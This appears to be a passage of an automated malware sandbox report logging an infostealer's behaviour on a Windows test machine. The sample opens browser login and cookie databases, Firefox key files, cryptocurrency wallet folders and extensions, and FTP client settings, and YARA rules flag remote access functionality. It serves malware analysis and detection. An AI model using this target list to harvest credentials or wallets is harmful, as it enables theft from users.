Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: number of queries: 1403
Source: Yara match File source: 0000000A.00000003.2944432729.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.3131133881.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2173743072.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2911175052.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2218579742.0000000001538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2218352412.0000000001560000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 1880, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 58ce8f976c.exe PID: 6068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 58ce8f976c.exe PID: 504, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: 760934cb92.exe PID: 7144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 1880, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 58ce8f976c.exe PID: 6068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 58ce8f976c.exe PID: 504, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 32.2.num.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.num.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.num.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7451ae0b11.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.7451ae0b11.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000002.3135249068.0000000000BF1000.00000080.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2960373733.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.3127862196.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3268929874.0000000000141000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3144922950.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3001129617.0000000000141000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.3116653245.0000000000BF1000.00000080.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.3280933460.0000000000BF1000.00000080.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3004186690.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3274363852.0000000000F8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7451ae0b11.exe PID: 6196, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP